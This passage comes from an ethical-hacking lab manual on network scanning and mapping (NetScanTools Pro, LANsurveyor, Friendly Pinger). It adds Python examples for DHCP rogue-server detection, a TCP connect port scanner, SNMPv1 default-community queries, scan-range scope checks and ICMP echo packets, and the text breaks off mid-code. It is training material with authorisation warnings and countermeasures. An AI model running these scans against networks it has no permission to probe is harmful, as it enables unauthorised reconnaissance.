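What DHCP Server Discovery does in step 14 is broadcast a DHCPDISCOVER and collect every DHCPOFFER that comes back; any server that is not on the administrator's list is the "unknown or rogue" case the tool's description mentions. The following is an added example, not the tool's code and not from the lab manual: it builds the discover, decodes offers and their options, and flags unexpected servers. The offers in the test are constructed to match the lab's values (10.0.0.1 offering 10.0.0.7 with mask 255.255.255.0) plus an invented rogue at 10.0.0.66; actually sending the discover (UDP source port 68 to 255.255.255.255:67 on a socket with SO_BROADCAST set) is left to the caller.

```python
"""DHCPDISCOVER builder, DHCP message/option parser and rogue-server check (RFC 2131/2132)."""
import ipaddress
import os
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER = 1, 2
OPT_SUBNET, OPT_ROUTER, OPT_DNS, OPT_LEASE = 1, 3, 6, 51
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_PARAMS, OPT_END = 53, 54, 55, 255
HEADER_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # 236 bytes; cookie and options follow


def ip4(text):
    return ipaddress.IPv4Address(text).packed


def opt(code, value):
    return bytes([code, len(value)]) + value


def build_dhcp(op, xid, client_mac, options, yiaddr="0.0.0.0", siaddr="0.0.0.0", flags=0x8000):
    """Assemble a DHCP message; flags=0x8000 asks servers to broadcast their reply."""
    chaddr = bytes(int(x, 16) for x in client_mac.split(":")).ljust(16, b"\x00")
    header = struct.pack(HEADER_FMT, op, 1, 6, 0, xid, 0, flags,
                         ip4("0.0.0.0"), ip4(yiaddr), ip4(siaddr), ip4("0.0.0.0"),
                         chaddr, b"\x00" * 64, b"\x00" * 128)
    return header + MAGIC_COOKIE + b"".join(options) + bytes([OPT_END])


def build_discover(client_mac, xid=None):
    """The probe a discovery tool broadcasts to UDP/67; every server on the segment answers."""
    if xid is None:
        xid = int.from_bytes(os.urandom(4), "big")
    options = [opt(OPT_MSG_TYPE, bytes([DISCOVER])),
               opt(OPT_PARAMS, bytes([OPT_SUBNET, OPT_ROUTER, OPT_DNS, OPT_LEASE]))]
    return build_dhcp(BOOTREQUEST, xid, client_mac, options)


def parse_dhcp(data):
    """Decode the fixed header and the TLV option area; None without the magic cookie."""
    if len(data) < 240 or data[236:240] != MAGIC_COOKIE:
        return None
    fields = struct.unpack(HEADER_FMT, data[:236])
    options, body, i = {}, data[240:], 0
    while i < len(body):
        code = body[i]
        if code == 0:                    # pad byte, carries no length
            i += 1
            continue
        if code == OPT_END:
            break
        length = body[i + 1]
        options[code] = body[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": fields[0], "xid": fields[4],
            "yiaddr": str(ipaddress.IPv4Address(fields[8])),
            "siaddr": str(ipaddress.IPv4Address(fields[9])),
            "chaddr": ":".join(f"{b:02x}" for b in fields[11][:6]), "options": options}


def ip_list(raw):
    """Router and DNS options carry one or more 4-byte addresses."""
    return [str(ipaddress.IPv4Address(raw[i:i + 4])) for i in range(0, len(raw) - 3, 4)]


def offers_for(xid, responses):
    """Summarise every DHCPOFFER that answers our transaction id; ignore everything else."""
    found = []
    for resp in responses:
        msg = parse_dhcp(resp)
        if not msg or msg["op"] != BOOTREPLY or msg["xid"] != xid:
            continue
        o = msg["options"]
        if o.get(OPT_MSG_TYPE) != bytes([OFFER]):
            continue
        found.append({
            "server": ip_list(o[OPT_SERVER_ID])[0] if OPT_SERVER_ID in o else msg["siaddr"],
            "offered_ip": msg["yiaddr"],
            "subnet_mask": ip_list(o[OPT_SUBNET])[0] if OPT_SUBNET in o else None,
            "routers": ip_list(o.get(OPT_ROUTER, b"")),
            "dns": ip_list(o.get(OPT_DNS, b"")),
            "lease_seconds": int.from_bytes(o[OPT_LEASE], "big") if OPT_LEASE in o else None,
        })
    return found


def rogue_servers(offers, authorized):
    """Offers from servers missing from the allow-list: the 'unknown or rogue' case."""
    allowed = set(authorized)
    return [offer for offer in offers if offer["server"] not in allowed]
```

Matching on the transaction id matters: an offer is only evidence of a live server if it answers our probe, so stale or replayed offers carrying another xid are dropped. The same allow-list check, run periodically from a monitoring host or enforced by DHCP snooping on the access switches, is what catches a rogue server before clients accept its gateway and DNS settings.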


Note: NetScanner is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations.

DHCP Server Discovery results window: interface 10.0.0.7 (Hyper-V Virtual Ethernet Adapter #2) selected; Discover Options Hostname, Subnet Mask, Domain Name, DNS, Router, and NTP Servers checked; the responding DHCP server 10.0.0.1 (server hostname 10.0.0.1) offered IP address 10.0.0.7 with subnet mask 255.255.255.0 and a lease of 3 days.

FIGURE 7.10: Result of DHCP Server Discovery

15. Click Ping Scanner in the left panel. A window will appear with information about the Ping Scanner tool. Click OK
About the Ping Scanner (aka NetScanner) Tool (as shown by NetScanTools Pro): Use this tool to ping a range or list of IPv4 addresses. This tool shows you which computers are active within the range (they have to respond to ping). To detect devices in your subnet including those blocking ping, you can use the ARP Scan tool. You can import a text list of IPv4 addresses to ping. Special feature: use the Do SMB/NBNS Scan option to get NetBIOS responses from unprotected Windows computers. Right-click in the results for a menu with more options. Demo limitations: Packet Delay (the time between sending each ping) is limited to a lower limit of 50 milliseconds; Packet Delay can be as low as zero (0) ms in the full version, so the full version will be a bit faster.

Note: Port Scanner is a tool designed to determine which ports on a target computer are active, i.e. being used by services or daemons.

FIGURE 7.11: Selecting the Ping Scanner option

16. Select the Use Default System DNS radio button, and enter the range of IP addresses in the Start IP and End IP boxes

17. Click Start


Note: Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network-connected device.

Ping Scanner results window (Start IP 10.0.0.1, End IP 10.0.0.50, Use Default System DNS selected): 10.0.0.1, 10.0.0.2, 10.0.0.5, and 10.0.0.7 answered with Echo Reply in 0 ms, with their hostnames resolved. Additional scan tests offered: Do Local ARP Scan, Do SMB/NBNS Scan, Do Subnet Mask Scan, and Enable Post-Scan Hostname lookup of Non-Responding IPs.

FIGURE 7.12: Result of the scanned IP addresses

18. Click Port Scanner in the left panel. A window will appear with information about the Port Scanner tool. Click OK

About the Port Scanner Tool (as shown by NetScanTools Pro): NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER'S PERMISSION TO SCAN. Use this tool to scan a target for TCP or UDP ports that are listening (open with a service listening). Types of scanning supported: Full Connect TCP scan (see notes below), UDP port unreachable scan, combined TCP full connect and UDP scan, TCP SYN only scan, and other TCP scan types. Special feature: after a target has been scanned, an analysis window will open in your default web browser. Right-click in the results for a menu with more options.

Notes: settings that strongly affect scan speed:
■ Connect Timeout: use 200 ms or less on a fast network connection with nearby computers, or 3000 ms (3 seconds) or more on a slow connection.
■ Wait After Connect: the time each port test waits after connecting before deciding that the port is not active.
■ Settings, Max Concurrent Connections: try 0, then try a higher value, and notice the difference.

Demo limitations: none.

Note: Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS number registries that you can access given the correct query.

FIGURE 7.13: Selecting the Port Scanner option

19. Enter the IP address in the Target Hostname or IP Address field and select the TCP Ports only radio button

20. Click Scan Range of Ports
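Steps 19 and 20 run the Full Connect TCP scan described in the tool's notes. As an added example (not NetScanTools code and not from the lab manual), the following Python scanner does the same thing with the standard library: complete the three-way handshake on each port, wait briefly for a banner, and classify what came back. The target host and port list are the caller's choice; the accompanying test starts a throwaway listener on 127.0.0.1 so it runs without a network target. The page's warning applies here as well: only scan hosts you own or have permission to scan.

```python
"""TCP connect scan with banner grabbing: the Full Connect scan, in the standard library."""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe_port(host, port, connect_timeout=0.5, wait_after_connect=0.5):
    """(port, banner) for an open port, (port, None) if closed or filtered.

    connect_timeout and wait_after_connect play the same roles as the tool's
    Connect Timeout and Wait After Connect settings.  A refused connection (RST)
    means closed; a connect timeout usually means a firewall is dropping the SYN.
    """
    try:
        with socket.create_connection((host, port), timeout=connect_timeout) as sock:
            sock.settimeout(wait_after_connect)
            try:
                banner = sock.recv(256)      # SSH, SMTP, FTP speak first
            except socket.timeout:
                banner = b""                 # open, but the server waits for us (HTTP)
            return port, banner.decode("ascii", "replace").strip()
    except OSError:                          # ConnectionRefusedError, timeout, unreachable
        return port, None


def scan_ports(host, ports, connect_timeout=0.5, wait_after_connect=0.5, max_workers=64):
    """Connect-scan the given ports concurrently; returns {open_port: banner}."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        results = list(pool.map(
            lambda p: probe_port(host, p, connect_timeout, wait_after_connect), ports))
    return {port: banner for port, banner in results if banner is not None}


def classify(banner):
    """Cheap service guess from the first line a server volunteered."""
    head = banner.upper()
    if head.startswith("SSH-"):
        return "ssh"
    if head.startswith("220") and "SMTP" in head:
        return "smtp"
    if head.startswith("220"):
        return "ftp"
    if banner:
        return "unknown"
    return "silent (try an HTTP request)"


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for port, banner in sorted(scan_ports(target, range(1, 1025)).items()):
        print(f"{port:5d}/tcp open  {classify(banner):28s} {banner[:60]}")
```

Every probe completes the handshake, so the scan appears in the target's application logs exactly as a client connection would; that is the trade-off against a SYN scan, which needs raw sockets and is not shown here.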


Port Scanner results window (Target Hostname or IP Address 10.0.0.1, TCP Ports only selected, Show All Scanned Ports checked): port 80 (http, TCP) is reported as active. Other options shown: UDP Ports only, TCP+UDP Ports, TCP SYN, Port Range and Services, Edit Common Ports List, and the Connect Timeout and Wait After Connect values in milliseconds (1000 = 1 second).
FIGURE 7.14: Result of Port Scanner

Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: NetScanTools Pro

Information Collected/Objectives Achieved:

ARP Scan Results:
■ IPv4 Address
■ MAC Address
■ I/F Manufacturer
■ Hostname
■ Entry Type
■ Local Address

Information for Discovered DHCP Servers:
■ IPv4 Address: 10.0.0.7
■ Interface Description: Hyper-V Virtual Ethernet Adapter #2
■ DHCP Server IP: 10.0.0.1
■ Server Hostname: 10.0.0.1
■ Offered IP: 10.0.0.7
■ Offered Subnet Mask: 255.255.255.0


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Does NetScanTools Pro support proxy servers or firewalls?

Internet Connection Required
□ Yes  ☑ No

Platform Supported
☑ Classroom  ☑ iLabs


Drawing Network Diagrams Using LANSurveyor
LANsurveyor discovers a network and produces a comprehensive network diagram that integrates OSI Layer 2 and Layer 3 topology data.

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario
An attacker can gather information from ARP Scan, DHCP Servers, etc. using NetScanTools Pro, as you have learned in the previous lab. Using this information an attacker can compromise a DHCP server on the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration. In this lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks.

Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network.
In this lab, you need to:

■ Draw a map showing the logical connectivity of your network and navigate around the map
■ Create a report that includes all your managed switches and hubs


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment
To perform the lab, you need:

■ LANSurveyor, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor
■ You can also download the latest version of LANSurveyor from http://www.solarwinds.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the LANSurveyor tool

Lab Duration
Time: 10 Minutes

Overview of LANSurveyor
SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets, and addresses reporting needs for PCI compliance and other regulatory requirements.

TASK 1: Draw Network Diagram

Lab Tasks
Install LANSurveyor on your Windows Server 2012. Follow the wizard-driven installation steps and install LANSurveyor.

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop


FIGURE 8.1: Windows Server 2012 - Desktop view

2. Click the LANSurveyor app to open the LANSurveyor window


Note: LANsurveyor's Responder client: manage remote Windows, Linux, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files.


FIGURE 8.2: Windows Server 2012 - Apps

3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation

SolarWinds LANsurveyor window: File, Edit, Manage, Monitor, Report, Tools, Window, and Help menus.

Note: LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)

FIGURE 8.3: LANSurveyor evaluation window

4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network


Getting Started with LANsurveyor dialog: "What you can do with LANsurveyor: scan and map Layer 1, 2, 3 network topology; export maps to Microsoft Visio; view example map; continuously scan your network automatically. Once saved, all custom maps can be used in SolarWinds network and application management software." Links to the thwack LANsurveyor forum, the Online Manual (LANsurveyor Administrator Guide), the Evalu
ation Guide, and Support; a Don't show again check box and the Start Scanning Network button.

Note: LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.

FIGURE 8.4: Getting Started with LANSurveyor wizard

5. The Create A Network Map window will appear; in order to draw a network diagram enter the IP addresses in Begin Address and End Address, and click Start Network Discovery


Create A New Network Map dialog: Network Parameters: Begin Address 10.0.0.1, End Address 10.0.0.254, Hops (following router hops requires SNMP router access). Routers, Switches and other SNMP Device Discovery: SNMPv1 Devices and SNMPv2c Devices with the community strings "public, private" (the factory defaults, which is why a scanner tries them first), and SNMPv3 Devices (SNMPv3 Options). Other IP Service Discovery: LANsurveyor Responders (with Responder password), ICMP (Ping), NetBIOS Clients, SIP Clients, Active Directory DCs. Mapping Speed: Slower to Faster. Buttons: Save Discovery Configuration, Load Discovery Configuration, Start Network Discovery, Cancel.

Note: LANsurveyor's network discovery discovers all network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address.

FIGURE 8.5: New Network Map window

6. The mapping progress for the entered IP address range will be displayed as shown in the following figure

Mapping Progress window: Searching for IP nodes, Hop 0: 10.0.0.1-10.0.0.254; counters for SNMP Sends, SNMP Receipts, ICMP Ping Sends, ICMP Receipts, Subnets Mapped, Nodes Mapped, Routers Mapped, and Switches Mapped; Last Node Contacted: WIN-D39MR5HL9E4; Cancel button.

Note: LANsurveyor is capable of discovering and mapping multiple VLANs on Layer 2. For example, to map a switch connecting multiple, nonconsecutive VLANs

FIGURE 8.6: Mapping progress window

7. LANSurveyor displays the map of your network


SolarWinds LANsurveyor - [Map 1] window: the left pane lists Network Segments (1), IP Addresses (4), Domain Names (4), Node Names (4), IP Routers, LANsurveyor Responder Nodes, SNMP Nodes, SNMP Switches/Hubs, SIP (VoIP) Nodes, Layer 1 Nodes, Active Directory DCs, and Groups; the map pane shows the 10.0.0.0 - 10.0.0.255 segment with the four discovered nodes, including WIN-D39MR5HL9E4, and an Overview pane.

Note: LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.

FIGURE 8.7: Resulted network diagram

Lab Analysis
Document all the IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during the lab.

Tool/Utility: LANsurveyor
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1 - 10.0.0.254
IP Nodes Details:
■ SNMP Sends - 62
■ ICMP Ping Sends - 31
■ ICMP Receipts - 4
■ Nodes Mapped - 4
Network Segment Details:
■ IP Addresses - 4
■ Domain Names - 4
■ Node Names - 4

Ask your instructor if you have questions related to this lab.

Questions
1. Does LANsurveyor map every IP address to its corresponding switch or hub port?
2. Can nodes connected via wireless access points be detected and mapped?

Internet Connection Required
[ ] Yes  [x] No

Platform Supported
[x] Classroom  [x] iLabs


Mapping a Network Using Friendly Pinger
Friendly Pinger is a user-friendly application for network administration, monitoring, and inventory.

Lab Scenario
In the previous lab, you found the SNMP, ICMP Ping, Nodes Mapped, etc. details using the tool LANsurveyor. If an attacker is able to get hold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces on a router using the default community name public and disable them using the read-write community. SNMP MIBs include information about the identity of the agent's host, and an attacker can take advantage of this information to initiate an attack. Using the ICMP reconnaissance technique an attacker can also determine the topology of the target network. Attackers could also use either the ICMP "Time exceeded" or "Destination unreachable" messages; both of these ICMP messages can cause a host to immediately drop a connection. As an expert Network Administrator and Penetration Tester you need to discover the network topology, produce comprehensive network diagrams for discovered networks, and block attacks by deploying firewalls on a network to filter unwanted traffic. You should be able to block outgoing SNMP traffic at border routers or firewalls, and the default community names should be replaced. In this lab, you will learn to map a network using the tool Friendly Pinger.
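Worked example of the SNMP exchange the scenario describes, added here and not taken from the lab manual, LANsurveyor or Friendly Pinger: it builds the SNMPv1 GetRequest for sysDescr.0 that a mapper using the default community string "public" sends, and decodes a GetResponse. The reply content ("Linux router 3.10") is constructed for the example; the OIDs and tags are the standard RFC 1157/1213 values.

```python
"""SNMPv1 GetRequest/GetResponse BER encoder and decoder (added example).

Not code from the CEH lab manual, LANsurveyor or Friendly Pinger. It produces the
datagram a mapper sends to read sysDescr.0 and shows that the only "credential" it
carries is the plaintext community string (e.g. "public"), which is why default
community strings and unfiltered UDP/161 matter. Nothing is sent on the network;
the GetResponse parsed at the bottom is constructed here.
"""

SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"      # RFC 1213 system.sysDescr.0
TAG_INT, TAG_OCTSTR, TAG_NULL, TAG_OID, TAG_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
TAG_GETREQUEST, TAG_GETRESPONSE = 0xA0, 0xA2   # context-specific constructed tags


def _length(n: int) -> bytes:
    # BER length: short form below 128, long form (0x80 | byte count) otherwise
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _length(len(content)) + content


def encode_int(v: int) -> bytes:
    # two's complement, minimal length (adds a leading 0x00 when the top bit is set)
    return tlv(TAG_INT, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]          # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                          # base-128, continuation bit on all but last
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(TAG_OID, bytes(out))


def build_message(community: str, pdu_tag: int, request_id: int, varbinds) -> bytes:
    """varbinds: list of (dotted oid, value TLV bytes). Version 0 is SNMPv1."""
    vbl = b"".join(tlv(TAG_SEQ, encode_oid(oid) + val) for oid, val in varbinds)
    pdu = encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(TAG_SEQ, vbl)
    return tlv(TAG_SEQ, encode_int(0) + tlv(TAG_OCTSTR, community.encode()) + tlv(pdu_tag, pdu))


def get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    return build_message(community, TAG_GETREQUEST, request_id, [(oid, tlv(TAG_NULL, b""))])


def _read_tlv(buf: bytes, pos: int):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                           # long-form length
        nbytes = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + ln], pos + ln


def _children(content: bytes):
    pos = 0
    while pos < len(content):
        tag, val, pos = _read_tlv(content, pos)
        yield tag, val


def decode_oid(raw: bytes) -> str:
    arcs, cur = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))


def parse_message(datagram: bytes) -> dict:
    """Decode version, community, PDU type, request-id and varbinds of an SNMPv1 message."""
    _, msg, _ = _read_tlv(datagram, 0)
    (_, ver), (_, comm), (pdu_tag, pdu) = list(_children(msg))
    fields = list(_children(pdu))           # request-id, error-status, error-index, varbinds
    varbinds = []
    for _, vb in _children(fields[3][1]):
        (_, oid_raw), (vtag, vraw) = list(_children(vb))
        value = (vraw.decode("utf-8", "replace") if vtag == TAG_OCTSTR
                 else int.from_bytes(vraw, "big", signed=True) if vtag == TAG_INT else None)
        varbinds.append((decode_oid(oid_raw), value))
    return {"version": int.from_bytes(ver, "big"), "community": comm.decode(),
            "pdu": pdu_tag, "request_id": int.from_bytes(fields[0][1], "big", signed=True),
            "varbinds": varbinds}


if __name__ == "__main__":
    print(get_request("public", SYS_DESCR_0).hex())
    # constructed reply, as an agent still using the default community would answer
    reply = build_message("public", TAG_GETRESPONSE, 1,
                          [(SYS_DESCR_0, tlv(TAG_OCTSTR, b"Linux router 3.10"))])
    print(parse_message(reply))
```

Compare the hex dump with a capture of LANsurveyor's SNMP probes: the community string sits in the clear immediately after the version field, so anyone on the path can read it, and a read-write string exposed the same way is what lets an attacker set ifAdminStatus on a router interface. Filtering UDP/161 at the perimeter and replacing "public"/"private" are the matching countermeasures.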

Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network. In this lab, you need to:
■ Discover a network using discovery techniques
■ Diagram the network topology
■ Detect new devices and modifications made to the network topology
■ Perform inventory management for hardware and software assets


Lab Environment
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

To perform the lab, you need:
■ Friendly Pinger, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger
■ You can also download the latest version of Friendly Pinger from http://www.kilievich.com/fpinger/download.htm
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Friendly Pinger tool

Lab Duration
Time: 10 Minutes

Overview of Network Mapping
Network mapping is the study of the physical connectivity of networks. It is often carried out to discover the servers and operating systems running on a network, and it detects new devices and modifications made to the network topology. The inventory it produces also supports hardware and software asset management. Friendly Pinger performs the following to map the network:
■ Monitors the availability of network devices
■ Notifies you if any server wakes up or goes down
■ Pings all devices in parallel at once
■ Audits hardware and software components installed on the computers over the network

Lab Tasks

TASK 1: Install Friendly Pinger
1. Install Friendly Pinger on your Windows Server 2012.
2. Follow the wizard-driven installation steps and install Friendly Pinger.
3. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

TASK 2: Draw Network Map


FIGURE 9.1: Windows Server 2012 - Desktop view

4. Click the Friendly Pinger app to open the Friendly Pinger window.

You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.

Friendly Pinger will display the IP address of your computer and will offer a sample range of IP addresses for scanning.

FIGURE 9.2: Windows Server 2012 - Apps (Start screen showing the Friendly Pinger tile among Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, Mozilla Firefox, Command Prompt and other apps)

5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration.
6. Click No.

To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. As the intermediate addresses are determined, they are listed in this window and the route is drawn as red arrows on the map.

Friendly Pinger [Demo.map] window: menu bar File, Edit, View, Ping, Notification, Scan, FWatcher, Inventory, Help; demonstration map with Workstation, Internet, Mail, Shortcut and Server devices; status bar "click the client area to add a new device..."

FIGURE 9.3: FPinger Main Window


7. Select File from the menu bar and select the Wizard option.

Scanning allows you to learn a lot about your network. Thanks to its scanning technology, you may quickly find all the HTTP, FTP, e-mail and other services present on your network.

The map occupies most of the window. Right-click it and, in the context menu that appears, select "Add" and then "Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture.

Friendly Pinger [Demo.map], File menu: New (Ctrl+N), Reopen, Open... (Ctrl+O), Update, Save (Ctrl+S), Save As..., Close, Close All, Save As Image..., Print..., Lock..., Create Setup..., Options..., Wizard, Exit

FIGURE 9.4: FPinger Starting Wizard

8. To create the initial mapping of the network, type a range of IP addresses in the specified field as shown in the following figure and click Next.

Wizard dialog:
Local IP address: 10.0.0.7
The initial map will be created by querying the DNS server for information about the following IP addresses: 10.0.0.1-20
You can specify a more exact range of scanning to speed up this operation. For example: 10.129-135.1-5.1-10
Timeout: 1000
Help / Back / Next / Cancel

The device is displayed as an animated picture if it responds to ping, and as a black and white picture if it does not.

Lowering the timeout speeds up the search, but you may miss some addresses.

FIGURE 9.5: FPinger Initializing IP address range

9. The wizard will then scan the IP addresses in the network and list them.
10. Click Next.
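The wizard's range hint above is the only documentation of the range syntax on this page, so the following added example (not Friendly Pinger's code) assumes the semantics it implies: each dotted position is a single octet or a low-high range, and the scan covers every combination. It expands such a range, counts it, and checks it against the network you are authorised to scan before any probe is sent.

```python
"""Expand a Friendly Pinger-style scan range such as "10.129-135.1-5.1-10".

Added example, not code from the lab manual or from Friendly Pinger. The range
semantics are an assumption taken from the wizard's own hint: each dotted position
is a single octet or a low-high range, and the scan covers every combination.
Before scanning, within_scope() checks the expansion against the authorised
network so a typo in the range cannot send probes outside the engagement.
"""
import ipaddress
import itertools
import re

_PART = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")


def _octet_values(part: str) -> range:
    m = _PART.match(part)
    if not m:
        raise ValueError(f"bad range component: {part!r}")
    lo = int(m.group(1))
    hi = int(m.group(2)) if m.group(2) else lo
    if not 0 <= lo <= hi <= 255:
        raise ValueError(f"octet range out of order or out of bounds: {part!r}")
    return range(lo, hi + 1)


def _octets(spec: str) -> list:
    parts = spec.strip().split(".")
    if len(parts) != 4:
        raise ValueError("expected four dotted components")
    return [_octet_values(p) for p in parts]


def count_range(spec: str) -> int:
    """Number of addresses the spec covers, without materialising them."""
    n = 1
    for values in _octets(spec):
        n *= len(values)
    return n


def expand_range(spec: str) -> list:
    """Every IPv4 address covered by spec, in scan order (last octet varies fastest)."""
    return [".".join(map(str, combo)) for combo in itertools.product(*_octets(spec))]


def is_valid_spec(spec: str) -> bool:
    try:
        _octets(spec)
        return True
    except ValueError:
        return False


def within_scope(spec: str, authorised_cidr: str) -> bool:
    """True only if every address in the range lies inside the authorised network."""
    net = ipaddress.ip_network(authorised_cidr, strict=False)
    return all(ipaddress.IPv4Address(a) in net for a in expand_range(spec))


if __name__ == "__main__":
    for spec in ("10.0.0.1-20", "10.129-135.1-5.1-10"):
        addrs = expand_range(spec)
        print(f"{spec}: {count_range(spec)} addresses, {addrs[0]} .. {addrs[-1]}, "
              f"inside 10.0.0.0/24: {within_scope(spec, '10.0.0.0/24')}")
```

The lab's own range, 10.0.0.1-20, expands to 20 addresses; the hint's example covers 7 x 5 x 10 = 350 hosts across seven /24 networks, which is exactly the kind of range a scope check should refuse on an engagement limited to 10.0.0.0/24.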


Wizard results:
IP address   Name
10.0.0.2     WIN-MSSELCK4K41
10.0.0.3     Windows8
10.0.0.5     WIN-LXQN3WR3R9M
10.0.0.7     WIN-D39MR5HL9E4
The inquiry is completed. 4 devices found.
Remove the tick from devices which you don't want to add to the map.

Press CTRL+I to get more information about the created map. You will see your name as the map author in the dialog window that appears.

FIGURE 9.6: FPinger Scanning of Addresses completed

11. Keep the default options in the Wizard selection windows and click Next.

Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you specify a hostname instead of an address, the hostname is resolved to an IP address using your default DNS server. In this case you are vulnerable to a possible invalid entry on your DNS server.

Wizard dialog: Device type: Workstation; Address: Use IP-address / Use DNS-name (selected), Remove DNS suffix; Addition: Add devices to the new map / Add devices to the current map (selected); Help / Next / Cancel

FIGURE 9.7: FPinger selecting the Devices type

12. The client area then displays the network map in the FPinger window.
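The ping mechanism described above, as an added example that is not part of the lab manual or of Friendly Pinger: it builds an ICMP Echo Request with the RFC 1071 checksum, verifies a received packet, and matches a reply to its request by identifier and sequence number the way a ping tool does. Packets are built in memory only; sending them needs a raw socket and administrative rights.

```python
"""Build and verify an ICMP Echo Request, the packet "ping" sends (added example).

Not code from the lab manual or from Friendly Pinger. It shows the 8-byte ICMP
header (type 8, code 0, checksum, identifier, sequence) and the RFC 1071 ones'-
complement checksum that a ping tool computes and a receiver re-checks.
Nothing is transmitted.
"""
import struct

ICMP_ECHO_REPLY = 0
ICMP_DEST_UNREACHABLE = 3      # the "Destination unreachable" message named in the scenario
ICMP_ECHO_REQUEST = 8
ICMP_TIME_EXCEEDED = 11        # the "Time exceeded" message named in the scenario


def rfc1071_checksum(data: bytes) -> int:
    """Internet checksum: ones'-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"                      # pad an odd-length payload
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(identifier: int, sequence: int, payload: bytes = b"abcdefgh",
               icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """ICMP header + payload with the checksum filled in (computed over a zeroed field)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, identifier, sequence)
    csum = rfc1071_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, identifier, sequence) + payload


def parse_echo(packet: bytes) -> dict:
    """Decode an ICMP echo packet and report whether its checksum verifies."""
    if len(packet) < 8:
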